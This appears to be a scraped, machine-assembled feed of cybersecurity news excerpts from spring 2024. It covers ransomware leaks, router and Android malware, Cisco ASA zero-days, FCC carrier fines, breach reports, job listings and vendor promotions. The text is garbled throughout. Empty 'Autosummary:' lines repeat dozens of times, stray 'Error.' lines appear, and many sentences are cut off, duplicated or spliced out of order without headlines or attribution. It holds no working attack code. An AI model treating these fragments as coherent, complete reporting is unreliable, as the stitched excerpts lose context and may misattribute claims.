CylanceMDR includes hands-on onboarding, alert triage, investigation, managed threat hunting, digital forensics, comprehensive incident response, and critical event management. "Autosummary:
What You Will Learn: Understanding the Threat: Explore the escalated risks DDoS attacks pose to your business, including recent advancements in attack strategies like IoT botnets and amplification tactics. "Autosummary:
"Most times, attackers leverage trusted relationships to execute commands in connected compute instances (VMs) or hybrid environments by compromising third-party external vendors or contractors who have privileged access to manage internal cloud-based environments," the cloud security firm said. "Autosummary:
ZLoader Malware adds Zeus’s anti-analysis feature Pierluigi Paganini May 03, 2024 May 03, 2024 Zloader continues to evolve, its authors added an anti-analysis feature that was originally present in the Zeus banking trojan. "Autosummary:
" According to NATO, these recent incidents include "sabotage, acts of violence, cyber and electronic interference, disinformation campaigns, and other hybrid operations" impacting Czechia, Estonia, Germany, Latvia, Lithuania, Poland, and the United Kingdom. "Autosummary:
" In October 2022, Mullvad also found that Android devices were leaking DNS queries (e.g., IP addresses, DNS lookups, and HTTPS traffic) every time they connected to a WiFi network because of connectivity checks even if "Always-on VPN" was toggled on with "Block connections without VPN" enabled. "Autosummary:
"Autosummary:
LockBit published data stolen from Simone Veil hospital in Cannes Pierluigi Paganini May 03, 2024 May 03, 2024 LockBit ransomware operators have published sensitive data allegedly stolen from the Simone Veil hospital in Cannes. "Autosummary:
"Autosummary:
" In October 2022, Mullvad also found that Android devices were leaking DNS queries (e.g., IP addresses, DNS lookups, and HTTPS traffic) every time they connected to a WiFi network because of connectivity checks even if "Always-on VPN" was toggled on with "Block connections without VPN" enabled. "The exploitation of vulnerabilities as an initial point of entry almost tripled from the previous year, accounting for 14% of all breaches, according to Verizon’s 2024 Data Breach Investigations Report, which analyzed a record-high 30,458 security incidents and 10,626 confirmed breaches in 2023. This spike was driven primarily by the increasing frequency of attacks targeting vulnerabilities on unpatched systems and devices (zero-day vulnerabilities) by ransomware actors. The MOVEit software breach was one of the largest … More
The post 2024 Data Breach Investigations Report: Most breaches involve a non-malicious human element appeared first on Help Net Security.
"Autosummary:
Other key findings from this year’s report include: 32% of all breaches involved some type of extortion technique, including ransomware Over the past two years, roughly a quarter (between 24% and 25%) of financially motivated incidents involved pretexting Over the past 10 years, the Use of stolen credentials has appeared in almost one-third (31%) of all breaches Half of the reaches in EMEA are internal Espionage attacks continue to dominate in APAC region “The Verizon 2024 Data Breach Investigations Report shows it’s the still the basics security errors putting organizations at risk, such as long windows between discovering and patching vulnerabilities, and employees being inadequately trained to identify scams. "The ISC2 study on women in cybersecurity, a comprehensive research effort that collected responses from 2,400 women, has revealed several significant findings. These include promising trends in women’s entry into the profession, their roles within teams, and their comparable achievements with men. However, the study also underscores the need for continued efforts to support and promote women in the cybersecurity workforce. Increased diversity With the average representation of women on cybersecurity teams at 23%, attracting … More
The post Women rising in cybersecurity roles, but roadblocks remain appeared first on Help Net Security.
"Autosummary:
Women want to work in a constantly evolving field (21%) and one where they can help people and society (16%) at higher rates than men (18% and 14%, respectively). "Vishing and deepfake phishing attacks are on the rise as attackers leverage GenAI to amplify social engineering tactics, according to Zscaler. AI automates and personalizes various aspects of the attack process AI-driven phishing attacks leverage AI tools to enhance the sophistication and effectiveness of phishing campaigns. AI automates and personalizes various aspects of the attack process, making phishing even more challenging to detect. For example, chatbots are commonly used to craft highly convincing, error-free phishing … More
The post AI-driven phishing attacks deceive even the most aware users appeared first on Help Net Security.
"Autosummary:
For this report, Zscaler ThreatLabz analyzed 2 billion blocked phishing transactions between January–December 2023, exploring various aspects including the top phishing attacks, targeted countries, hosting countries for phishing content, distribution of company types based on server IP addresses, and the top referrers linked to these phishing attacks. "Autosummary:
However, a successful foothold is followed by the deployment of a bash script that gathers host data, such as the contents of /etc, running processes, active connections, and mounts, and exfiltrates the details to an actor-controlled domain ("kkthreas[.]com/upload"). "Autosummary:
: get complete visibility of your network perimeter, track active and unresponsive targets, identify changes, monitor expiring certificates, and see any ports, services or protocols that shouldn"t be exposed to the internet.Know what"s exposed : get complete visibility of your network perimeter, track active and unresponsive targets, identify changes, monitor expiring certificates, and see any ports, services or protocols that shouldn"t be exposed to the internet. "Autosummary:
"Autosummary:
Panda Restaurant Group disclosed a data breach Pierluigi Paganini May 02, 2024 May 02, 2024 Panda Restaurant Group disclosed a data breach that occurred in March, resulting in the theft of associates’ personal information. "Autosummary:
REvil was one of the most successful ransomware operations in recent history, reaching its peak in 2021 with the Kaseya MSP supply-chain attack, a $50 million ransom demand from computer maker Acer, and blueprint leaks of unreleased upcoming Apple devices. "Autosummary:
"Cuttlefish, a new malware family that targets enterprise-grade small office/home office (SOHO) routers, is used by criminals to steal account credentials / secrets for AWS, CloudFlare, Docker, BitBucket, Alibaba Cloud and other cloud-based services. “With the stolen key material, the actor not only retrieves cloud resources associated with the targeted entity but gains a foothold into that cloud ecosystem, ” Black Lotus Labs researchers noted. “To exfiltrate data, the threat actor first creates either a … More
The post New SOHO router malware aims for cloud accounts, internal company resources appeared first on Help Net Security.
"Autosummary:
“Internet routers remain a popular asset for threat actors to compromise since they often have reduced security monitoring, have less stringent password policies, are not updated frequently, and may use powerful operating systems that allows for installation of malware such as cryptocurrency miners, proxies, distributed denial of service (DDoS malware), malicious scripts, and webservers,” Trend Micro researchers recently pointed out. "Trend Micro launched significant additional AI-powered functionality in its platform to secure organizational use of AI and better manage the risks associated with mass adoption of new AI tools. “Great advancements in technology always come with new cyber risk. Like cloud and every other leap in technology we have secured, the promise of the AI era is only powerful if protected. Our latest platform updates deliver new efficiencies to security teams and provide critical guidelines … More
The post Trend Micro expands AI-powered cybersecurity platform appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The flaw impacts the following versions: 16.1 prior to 16.1.5 16.2 prior to 16.2.8 16.3 prior to 16.3.6 16.4 prior to 16.4.4 16.5 prior to 16.5.6 16.6 prior to 16.6.4 16.7 prior to 16.7.2 GitLab addressed the flaw with the releases 16.7.2, 16.5.6, and 16.6.4. "Autosummary:
Error. "Autosummary:
Consider the following red flags: They ask for an upfront fee before commencing their ‘work’, or another charge (i.e., tax) before you can proceed with processing refunds They may communicate with a web-based email (e.g., Gmail/Yahoo) rather than a corporate account They ask for your banking, crypto account and/or personal information in order to ‘return’ your funds They claim to work closely with law enforcement or government officials They get in touch out of the blue – either via social media DMs, text or email They don’t offer any telephone number via which to get in touch Consider the following steps if you have recently lost cryptocurrency due to fraud or theft: Collect as much evidence as possible Report the incident to the police and/or relevant regulatory body Reach out to a legitimate law firm that offers recovery services – being sure to research their business fully first Consider contacting the exchange where the scammer cashed out your crypto (if known) Avoiding crypto theft Granted, the best way to avoid crypto recovery scams is not to have your digital currency stolen in the first place. "Autosummary:
"In this Help Net Security interview, Charly Davis, CCO at Sapphire, provides insights into the current challenges and barriers women face in the cybersecurity industry. Davis emphasizes the need for proactive strategies to attract diverse talent, improve mentorship opportunities, and foster supportive organizational cultures in cybersecurity. Could you explain the current skills gap in cybersecurity and what makes it a critical issue for both private and public sectors? The widening cyber skills gap has been … More
The post Making cybersecurity more appealing to women, closing the skills gap appeared first on Help Net Security.
"Autosummary:
To achieve balance, a team with diverse backgrounds, religions, genders, skill sets, life experiences, and ages is needed.There are some strong examples out there, like Women in Cybersecurity, but I think women can be reluctant to join them because they don’t want to be different to their male counterparts and want to be part of an inclusive operating structure such as Tech Channel Ambassadors recently established to address this significant gap in the sector Personal mentorship can drive really positive change, and it’s certainly had a strong influence on my career. On some days, you may need to deal with nation-state actors with different geopolitical profiles, while on other days, you may encounter some young hacktivists.In this Help Net Security interview, Charly Davis, CCO at Sapphire, provides insights into the current challenges and barriers women face in the cybersecurity industry.One big contributor is rising demand – cyber threats are now very prominent on the business agenda, and we have multiple regulations like the GDPR, DORA, and NIS2 with a mandate for better security. "Adversary Simulation Specialist LyondellBasell | Poland | On-site – View job details The Adversary Simulation Specialist will be responsible for testing and evaluating the security of a LyondellBasell’s networks, systems, and applications. This role involves conducting application assessments, vulnerability assessments, penetration testing, and ethical hacking to identify and exploit vulnerabilities to improve the organization’s security posture. Cloud Cyber Defense Engineer Deloitte | United Kingdom | Hybrid – View job details As a Cloud Cyber Defense … More
The post Cybersecurity jobs available right now: May 1, 2024 appeared first on Help Net Security.
"Autosummary:
Cyber Security Analyst Salt Security | Israel | On-site – View job details As a Cyber Security Analyst, you will monitor and analyze security events and alerts, perform triage of incoming alerts – assess the priority, determine risk, and respond, create tickets and escalate them to higher-level security analysts and developers. Threat Operations Security Engineer Thought Machine | United Kingdom | Hybrid – View job details As Threat Operations Security Engineer, you will develop, integrate, and operate highly available log collection, event monitoring, alert generation, and incident management tooling and services for security using Elastisearch on Kubernetes. "Autosummary:
The FCC fined AT&T, Sprint, T-Mobile, and Verizon a total of almost $200 million for “illegally sharing access to customers’ location information without consent and without taking reasonable measures to protect that information against unauthorized disclosure.” "Autosummary:
The malware passively sniffs packets searching for "credential markers" within the traffic, such as usernames, passwords, and tokens especially associated with public cloud-based services like Alicloud, AWS, Digital Ocean, CloudFlare, and BitBucket. "Autosummary:
"Wpeeper is a typical backdoor Trojan for Android systems, supporting functions such as collecting sensitive device information, managing files and directories, uploading and downloading, and executing commands," researchers from the QiAnXin XLab team said. "Autosummary:
Huntress Security Awareness Training is an easy, effective, and enjoyable solution that helps: Minimize time-consuming maintenance and management tasks Improve knowledge retention through neuroscience-based learning principles Update you and your employees on the current threat landscape Establish a culture that values cybersecurity Inspire meaningful behavioral habits to improve security awareness Engage you and your employees in a creative, impactful manner Assure regulatory compliance Keep cyber criminals out of your organization Discover how a fully managed SAT can free up your time and resources, all while empowering your employees with smarter habits that better protect your organization from cyber threats.Your SAT should feature engaging videos, text, and short quizzes that showcase realistic cyber threats you and your employees are likely to encounter in the wild, such as: Phishing Social engineering Physical device security and more Measurable data …with easy-to-read reports on usage and success rates.These simulations should also be dispersed at unpredictable time intervals (i.e. morning, night, weekends, early in the month, later in the month, etc.), keeping learners on their toes and allowing them to put their security knowledge into practice.Remember, if the episodes are intentionally entertaining and whimsical, you"re more likely to find your employees conversing about inside jokes, recurring characters, and, of course, what they"ve learned.At their core, SAT programs are designed to help you: Educate your employees on recognizing cybersecurity risks such as phishing and ransomware Minimize your organization"s exposure to cyber threats Maintain regulatory compliance with cyber insurance stipulations These are all worthwhile goals in helping your organization thrive amidst ever-evolving cyber threats. For your own administrative needs, select a SAT that can sync regularly with your most popular platforms, such as Microsoft 365, Google, Okta, or Slack. "Autosummary:
Over the past two months, email-based phishing campaigns have also been observed targeting organizations in the U.S., Turkey, Mauritius, Israel, Russia, and Croatia with Taskun malware, which acts as a facilitator for Agent Tesla, per findings from Veriti. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The idea, in a nutshell, is to uncover illicit activity and money laundering patterns by taking advantage of blockchain"s pseudonymity and combining it with knowledge about the presence of licit (e.g., exchange, wallet provider, miner, etc.) and illicit services (e.g., darknet market, malware, terrorist organizations, Ponzi scheme, etc.) on the network. "Autosummary:
Cuttlefish malware targets enterprise-grade SOHO routers Pierluigi Paganini May 01, 2024 May 01, 2024 A new malware named Cuttlefish targets enterprise-grade and small office/home office (SOHO) routers to harvest public cloud authentication data. Researchers at Lumen’s Black Lotus Labs discovered a new malware family, named Cuttlefish, which targets enterprise-grade and small office/home office (SOHO) routers to harvest public cloud authentication data from internet traffic. "Autosummary:
The joint advisory comes from six US govt agencies, including CISA, FBI, NSA, EPA, DOE, USDA, and FDA, as well as the Multi-State Information Sharing and Analysis Center (MS-ISAC), Canada"s Centre for Cyber Security (CCCS), and United Kingdom"s National Cyber Security Centre (NCSC-UK). "Organizations worldwide need talented, experienced, and knowledgeable cybersecurity teams who understand the advantages and risks of emerging technologies. Aspiring leaders in the cybersecurity field need more than just job experience. They need a diverse and robust set of skills that can only be acquired through a combination of experience, learning, and dedication. Inside the eBook: Cybersecurity Needs More Skilled Professionals Technical and Non-Technical Skills for Leadership What Cybersecurity Leaders Have in Common How Certification Positions … More
The post eBook: Do you have what it takes to lead in cybersecurity? appeared first on Help Net Security.
"Autosummary:
"In this Help Net Security interview, Mike Lemberger, Visa’s SVP, Chief Risk Officer, North America, discusses the severe financial losses resulting from triangulation fraud, estimating monthly losses to range from $660 million to $1 billion among merchants. He also highlights the emerging threat of AI-powered voice scams, urging businesses to implement MFA, behavioral biometrics, and employee education to mitigate vulnerabilities and foster collaboration among businesses, technology providers, and regulatory bodies. Could you shed light on … More
The post Triangulation fraud: The costly scam hitting online retailers appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Mike Lemberger, Visa’s SVP, Chief Risk Officer, North America, discusses the severe financial losses resulting from triangulation fraud, estimating monthly losses to range from $660 million to $1 billion among merchants. He also highlights the emerging threat of AI-powered voice scams, urging businesses to implement MFA, behavioral biometrics, and employee education to mitigate vulnerabilities and foster collaboration among businesses, technology providers, and regulatory bodies. "While every organization across every vertical is at risk of advanced email attacks, certain industries periodically become the go-to target for threat actors. In this Help Net Security video, Mick Leach, Field CISO at Abnormal Security, discusses why the automotive industry is the new most popular target for business email compromise and vendor email compromise attacks. The automotive industry is currently being targeted by cybercriminals who are launching business email compromise (BEC) and vendor email … More
The post Why the automotive sector is a target for email-based cyber attacks appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The FCC imposes $200 million in fines on four US carriers for unlawfully sharing user location data Pierluigi Paganini April 30, 2024 April 30, 2024 The Federal Communications Commission (FCC) fined the largest U.S. wireless carriers $200 million for sharing customers’ real-time location data without consent. "Autosummary:
To ensure that the organization’s evaluations reflect current cyberthreats, each round of testing follows three steps: Collecting and verifying in-the-wild malware: AVLab regularly collects malware samples from malicious and active URLs, testing the malware samples to understand their impact to networks and endpoints. "The Federal Communications Commission (FCC) fined the nation’s largest wireless carriers for illegally sharing access to customers’ location information without consent and without taking reasonable measures to protect that information against unauthorized disclosure. Wireless carriers shared access to customers’ location data Sprint and T-Mobile – which have merged since the investigation began – face fines of more than $12 million and $80 million, respectively. AT&T is fined more than $57 million, and Verizon is fined … More
The post FCC fines major wireless carriers over illegal location data sharing appeared first on Help Net Security.
"Autosummary:
Wireless carriers continued to sell access to location data The investigations that led to these fines started following public reports that customers’ location information was being disclosed by the largest American wireless carriers without customer consent or other legal authorization to a Missouri Sheriff through a “location-finding service” operated by Securus, a provider of communications services to correctional facilities, to track the location of numerous individuals. "There are proof-of-concept techniques allowing attackers to achieve persistence on Palo Alto Networks firewalls after CVE-2024-3400 has been exploited, the company has confirmed on Monday, but they are “not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.” “These techniques work on a device that is already compromised with interactive root level command execution,” they added. The evolving situation On April 12, Palo Alto Networks … More
The post Palo Alto firewalls: CVE-2024-3400 exploitation and PoCs for persistence after resets/upgrades appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Specifically, this spans four different functions such as govern, map, measure, and manage all through the AI lifecycle - Establish an organizational culture of AI risk management Understand your individual AI use context and risk profile Develop systems to assess, analyze, and track AI risks Prioritize and act upon AI risks to safety and security "Critical infrastructure owners and operators should account for their own sector-specific and context-specific use of AI when assessing AI risks and selecting appropriate mitigations," the agency said. "Autosummary:
Error. "Autosummary:
"Autosummary:
The "Downloader" and "eBook Phishing" campaigns created fake repositories in batches, while the "Website SEO" campaign created a few repositories daily and used a single user per repository. "Autosummary:
"Autosummary:
Solving a fake Cloudflare captcha to download payload Source: BleepingComputer The downloaded JavaScript script is heavily obfuscated with comments that include a hidden function that extracts text from comments that start with "////" and then executes the script to download an MSI from a hardcoded URL, as shown in the deobfuscated script below. "Autosummary:
"Most businesses see offensive AI fast becoming a standard tool for cybercriminals, with 93% of security leaders expecting to face daily AI-driven attacks, according to Netacea. Offensive AI in cyberattacks The research, “Cyber security in the age of offensive AI”, surveyed security leaders in the UK and US about their experience with AI as a tool in cybersecurity. It reveals that not only do most security leaders expect daily AI-driven attacks, 65% expect that offensive … More
The post AI is creating a new generation of cyberattacks appeared first on Help Net Security.
"Autosummary:
“The pressure is on security leaders to do more with less, and so the rise of the use of AI to enhance cyber attacks could not have come at a worse time,” said Andy Still, CTO, Netacea. "The list of skills technologists and organizations need to succeed grows with each new tech advancement, according to Pluralsight. But for many organizations, budgets and staff continue to shrink. This survey asked 1,400 executives and IT professionals how organizations can leverage technology to drive business value in a world where budgets and headcount are decreasing and technology is evolving at a rapid pace. Critical skills gaps in organizations The results were unanimous across markets and … More
The post Closing the cybersecurity skills gap with upskilling programs appeared first on Help Net Security.
"Autosummary:
Critical skills gaps in organizations The results were unanimous across markets and career levels: cybersecurity, cloud, and software development, which are considered the most imperative tech skills to learn, are the top areas where skills gaps persist. “While we know AI/ML skills are increasingly critical, we’ve also found that organizations have other, more immediate upskilling priorities,” said Aaron Rosenmund, Pluralsight’s Senior Director of Security & GenAI Skills. "In this Help Net Security round-up, we present excerpts from previously recorded videos in which security experts talk about how increased adoption of cloud technology, remote work, and the proliferation of IoT devices present significant challenges for organizations. To tackle them, cybersecurity professionals are increasingly focusing on incident response, multicloud security, and IoT protection. They also discuss how AI is emerging as a valuable tool, but it presents its own set of problems, emphasizing the … More
The post Anticipating and addressing cybersecurity challenges appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The compromised information varied for each individual, potentially exposed information included the patient’s first and last name, date of birth, home address, phone number(s), e-mail address, medical record number, client identification number, dates of service, and/or medical information (e.g., diagnosis/condition, treatment, test results, medications), and/or health plan information. "Autosummary:
"The Product Security and Telecommunications Infrastructure (PSTI) Act has come into effect today, requiring manufacturers of consumer-grade IoT products sold in the UK to stop using guessable default passwords and have a vulnerability disclosure policy. “Most smart devices are manufactured outside the UK, but the PSTI act also applies to all organisations importing or retailing products for the UK market. Failure to comply with the act is a criminal offence, with fines up to £10 … More
The post UK enacts IoT cybersecurity law appeared first on Help Net Security.
"Autosummary:
About the legislation The PSTI Act covers internet- and network-connectable products, including “smart”: TVs, streaming devices, speakers Games consoles, smartphones, tablets Base stations and hubs Home automation and alarm systems “Wearables”: smart watches, fitness trackers, etc. "Silobreaker announced the addition of automatic collection, AI-enhanced analysis, and alerting on 8-K cybersecurity incident filings made to the US Securities and Exchange Commission (SEC). This enhancement to the Silobreaker platform empowers organizations to stay informed about critical cybersecurity incidents affecting US companies. SEC 8-K Item 1.05 mandates that publicly traded companies in the US must disclose ‘material cybersecurity incidents’ within 4 business days of the event. Although designed to enhance investor awareness, SEC 8-K … More
The post Silobreaker empowers users with timely insight into key cybersecurity incident filings appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
During the investigation, the FCC"s Enforcement Bureau found that each of the four mobile carriers sold their customers" real-time location data to "aggregators," who then resold this information to dozens of third-party location-based service providers, revealing where the customers were going and who they were. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359) A state-sponsored threat actor has managed to compromise Cisco Adaptive Security Appliances (ASA) used on government networks across the globe and use two zero-day vulnerabilities (CVE-2024-20353, CVE-2024-20359) to install backdoors on them, Cisco Talos researchers have shared on Wednesday. MITRE breached by nation-state threat actor via Ivanti zero-days MITRE has … More
The post Week in review: Two Cisco ASA zero-days exploited, MITRE breach, GISEC Global 2024 appeared first on Help Net Security.
"Autosummary:
Here are a few photos from the event, featured vendors include: Waterfall Security Solutions, Netskope, Google Cloud, Huawei, NetSPI, SecureLink, Cloudflare, IT Max Global, Deloitte, Pulsec, Help AG, Splunk, Netscout, Zscaler, SecurityScorecard, OPSWAT, Ciqur24, toolswatch.Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359) A state-sponsored threat actor has managed to compromise Cisco Adaptive Security Appliances (ASA) used on government networks across the globe and use two zero-day vulnerabilities (CVE-2024-20353, CVE-2024-20359) to install backdoors on them, Cisco Talos researchers have shared on Wednesday. "Autosummary:
Targeted operation against Ukraine exploited 7-year-old MS Office bug Pierluigi Paganini April 28, 2024 April 28, 2024 A hacking campaign targeted Ukraine exploiting a seven-year-old vulnerability in Microsoft Office to deliver Cobalt Strike. "Autosummary:
Comparison of total queries between legitimate (left) and malicious domains (right) Akamai However, the stats show that traffic to malicious domains between November to December was higher compared to the legitimate one, indicating increased malicious activity during winter holiday season. "Autosummary:
ICICI Bank exposed credit card data of 17000 customers Pierluigi Paganini April 28, 2024 April 28, 2024 ICICI Bank, a major private bank in India, mistakenly exposed the sensitive data of thousands of new credit cards to unintended recipients. "Autosummary:
" Operation Dream Job, linked to the prolific Lazarus Group from North Korea, is a long-running offensive campaign that sends unsuspecting professionals employed in various sectors like aerospace, cryptocurrency, defense, and other sectors malicious files dressed as job offers to distribute malware. "Autosummary:
Brokewell malware supports “accessibility logging,” it records any device events such as touches, swipes, displayed information, text input, and opened applications. "Autosummary:
"Sponsored by Russian military intelligence, APT44 is a dynamic and operationally mature threat actor that is actively engaged in the full spectrum of espionage, attack, and influence operations," Mandiant said, describing the advanced persistent threat (APT) as engaged in a multi-pronged effort to help Russia gain a wartime advantage since January 2022. "Autosummary:
"Autosummary:
In reviewing your account use during that time, your personal information may have been accessed” According to the date breach notification, potentially compromised information may have included users name, address, date of birth, full or last four digits of Social Security Number, email address, phone number, EBT card number, case number, Medi-Cal ID number and information about their program eligibility and benefits. "Here’s a list of interesting cybersecurity companies that received funding so far in 2024. Aim Security January | $10 million Aim Security raised $10 million in seed funding, led by YL Ventures, with participation from CCL (Cyber Club London), the founders of WIZ and angel investors from Google, Proofpoint and Palo Alto Networks. Aim Security was founded by cybersecurity veterans Matan Getz, CEO and Adir Gruss, CTO who pioneered the use and adoption of AI … More
The post Breaking down the numbers: Cybersecurity funding activity recap appeared first on Help Net Security.
"Autosummary:
Permit.io February | $8 million Permit.io raised $8 million in Series A funding, led by Scale Venture Partners, along with NFX, Verissimo Ventures, Roosh Ventures, Firestreak, 92712, and other existing investors, to ensure application developers never have to build permissions again. StrikeReady April | $12 million StrikeReady has received $12 million in Series A funding, led by 33N Ventures, with participation from Hitachi Ventures, Monta Vista Capital and industry luminaries Brian NeSmith, executive chairman and former CEO at Arctic Wolf; and Rod Beckstrom, former CEO of ICANN and Founding Director of U.S. National Cybersecurity Center (now CISA). Aim Security January | $10 million Aim Security raised $10 million in seed funding, led by YL Ventures, with participation from CCL (Cyber Club London), the founders of WIZ and angel investors from Google, Proofpoint and Palo Alto Networks. "Autosummary:
"Autosummary:
"Autosummary:
Over 1,400 CrushFTP internet-facing servers vulnerable to CVE-2024-4040 bug Pierluigi Paganini April 26, 2024 April 26, 2024 Over 1,400 CrushFTP internet-facing servers are vulnerable to attacks exploiting recently disclosed CVE-2024-4040 vulnerability. "Autosummary:
Sweden’s liquor supply severely impacted by ransomware attack on logistics company Pierluigi Paganini April 26, 2024 April 26, 2024 A ransomware attack on a Swedish logistics company Skanlog severely impacted the country’s liquor supply. "Autosummary:
Some of the other features of Brokewell include the ability to record audio, take screenshots, retrieve call logs, access device location, list installed apps, record every every event happening on the device, send SMS messages, do phone calls, install and uninstall apps, and even disable the accessibility service. "Autosummary:
It operates in California, Colorado, the District of Columbia, Georgia, Hawaii, Maryland, Oregon, Virginia, and Washington. "Autosummary:
This vulnerability, a SQL injection (SQLi) flaw, poses a severe threat as attackers can exploit it to gain unauthorized access to websites, create admin‑level user accounts, upload malicious files, and potentially take full control of affected sites. ” reads the advisory. "Autosummary:
"Autosummary:
"In this Help Net Security interview, Assaf Mischari, Managing Partner, Team8 Health, discusses the risks associated with GenAI healthcare innovations and their impact on patient privacy. What are the key cybersecurity challenges in healthcare in the context of GenAI, and how can they be effectively addressed? The healthcare industry faces many of the same challenges other industries face in the wake of emerging technologies with subtle differences that need to be considered and addressed. For … More
The post Overcoming GenAI challenges in healthcare cybersecurity appeared first on Help Net Security.
"Autosummary:
Historically, healthcare data has many built-in biases when it comes to race, ethnicity, and gender but bias in GenAI could result from bias in the training dataset, feature selection, data collection, labeling process, or even the model architecture itself.With predictive analytics, healthcare professionals can anticipate patient flow, staffing needs, and resource utilization, enabling proactive decision-making and resource allocation. "In this article, you will find excerpts from reports we recently covered, which offer stats and insights into the challenges and cybersecurity issues arising from the expansion of AI. Security pros are cautiously optimistic about AI Cloud Security Alliance and Google Cloud | The State of AI and Security Survey Report | April 2024 55% of organizations plan to adopt GenAI solutions within this year, signaling a substantial surge in GenAI integration. 48% of professionals … More
The post 25 cybersecurity AI stats you should know appeared first on Help Net Security.
"Autosummary:
Code42 | Annual Data Exposure Report 2024 | March 2024 Since 2021, there has been a 28% average increase in monthly insider-driven data exposure, loss, leak, and theft events. Accenture | Work, workforce, workers: Reinvented in the age of generative AI | January 2024 While 95% of workers see value in working with GenAI, 60% are also concerned about job loss, stress and burnout. "Autosummary:
"It is suspected that Line Runner may be present on a compromised device even if Line Dancer is not (e.g., as a persistent backdoor, or where an impacted ASA has not yet received full operational attention from the malicious actors)," according to a joint advisory published by cybersecurity agencies from Australia, Canada, and the U.K. At every phase of the attack, UAT4356 is said to have demonstrated meticulous attention to hiding digital footprints and the ability to employ intricate methods to evade memory forensics and lower the chances of detection, contributing to its sophistication and elusive nature. "Autosummary:
"Anatomy IT has announced the launch of an expanded end-to-end cybersecurity product suite designed to safeguard healthcare delivery organizations from evolving and growing IT system threats. A record 133 million individuals were affected by healthcare data breaches in 2023, according to Modern Healthcare, a number equivalent to nearly 40% of the U.S. population. Industry observers warn, however, that breaches caused by cyberattacks are likely to increase in 2024 and beyond. Costs associated with cybersecurity incidents … More
The post Anatomy IT’s new Security Suite targets healthcare cybersecurity threats, improves incident response appeared first on Help Net Security.
"Autosummary:
In light of recent events and given this growing threat to patient safety and provider organizations, Anatomy IT is drawing on its three decades of healthcare operational and cybersecurity experience, as well as feedback from its more than 1,000 clients, on this new, broader, forward-looking service offering. "Autosummary:
"Autosummary:
"Autosummary:
Stealing the victim"s credentials ThreatFabric Device takeover: Allows the attacker to see the device"s screen in real-time (screen streaming). Tools sold on the threat actor"s website ThreatFabric The researchers discovered another tool called "Brokewell Android Loader," also developed by Samedit. "Autosummary:
Image Other "junk gun" ransomware examples include Diablo, Evil Extractor, Yasmha, HardShield, Jigsaw, LoliCrypt, and CatLogs. "Autosummary:
"Autosummary:
"Autosummary:
Infections of the particular PlugX variant Sekoia While the worm spread to 170 countries, just 15 of them account for over 80% of the total infections, with Nigeria, India, China, Iran, Indonesia, the UK, Iraq, and the United States being at the top of the list. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-20353 Cisco ASA and FTD Denial of Service Vulnerability CVE-2024-20359 Cisco ASA and FTD Privilege Escalation Vulnerability CVE-2024-4040 CrushFTP VFS Sandbox Escape Vulnerability Cisco Talos this week warned that the nation-state actor UAT4356 (aka STORM-1849) has been exploiting two zero-day vulnerabilities in Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) firewalls since November 2023 to breach government networks worldwide.It supports various features such as FTP, SFTP, FTPS, HTTP, HTTPS, WebDAV, and WebDAV SSL protocols, allowing users to transfer files securely over different networks. "Autosummary:
" Documents and e-mails in the compromised mailboxes included a combination of patients" personal and health information, including: first and last name, date of birth, home address, phone number(s), e-mail address, medical record number, client identification number, dates of service medical information (e.g., diagnosis/condition, treatment, test results, medications), and/or health plan information. "Autosummary:
Python’s versatility and short learning curve are just two factors that explain the language’s "grip" on cybersecurity The Python programming language, born from the creative genius of Guido van Rossum as far back as some 35 years ago, has evolved into a crucial tool for professionals working in various areas, including software development, data science, artificial intelligence and, notably, cybersecurity. Indeed, Python’s reputation precedes it, and this high-level, general-purpose programming language has become renowned, among other things, for its user-friendliness and a developer community of no fewer than 8.2 million people, as well as an extensive array of tools and libraries. "Autosummary:
"A staggering increase in QR code phishing (quishing) attacks during 2023 saw them skyrocket up the list of concerns for cyber teams globally, according to Egress. Attacks were both prolific and highly successful, demonstrating how cybercriminals effectively combine available technology with consumer familiarity (or complacency) at scale. The evolution of phishing attack payloads In 2021 and 2022, QR code payloads in phishing emails were relatively rare – accounting for 0.8% and 1.4% of attacks respectively. … More
The post AI set to play key role in future phishing attacks appeared first on Help Net Security.
"Autosummary:
On the other hand, the use of attachment-based payloads has decreased since 2021; three years ago, these accounted for 72.7% of attacks detected by Egress, and by the first quarter of 2024, this had fallen to 35.7% as threat actors evolve their payloads to evade cybersecurity efforts. "Blockchain Security Researcher StarkWare | Israel | On-site – View job details The Security Researcher will be responsible for conducting in-depth research and analysis on the security of blockchain systems, protocols and the infrastructure that enables it. CISO Rajah & Tann Asia | Singapore | On-site – View job details CISO will lead and oversee firm’s information security program. This includes developing and implementing security policies and procedures, managing security technologies and overseeing security awareness … More
The post Cybersecurity jobs available right now: April 24, 2024 appeared first on Help Net Security.
"Autosummary:
Security Engineer Verisk | Poland | Hybrid – View job details As a Security Engineer, you will have a chance to advance your skills in security automation through the utilization of AI, implement and administer database security solutions, data loss prevention policies, response rules, monitor and review data-related activities for policy violations and investigation. Information Security Specialist Kitopi | Dubai | Hybrid – View job details As Information Security Specialist, you will assist in developing information security policies, procedures and necessary documents in compliance with applicable standards and regulations, conduct phishing and social engineering test campaigns, measure key performance indicators to ensure the effectiveness of information security controls. "As organizations navigate the complexities of hybrid work arrangements and the gradual return to the office, the cybersecurity threat landscape has become increasingly challenging, with issues such as the proliferation of personal devices, the expansion of remote access points, and the potential for security gaps between in-office and remote environments. Issues such as the proliferation of personal devices, the expansion of remote access points, and the potential for security gaps between in-office and remote environments … More
The post The relationship between cybersecurity and work tech innovation appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
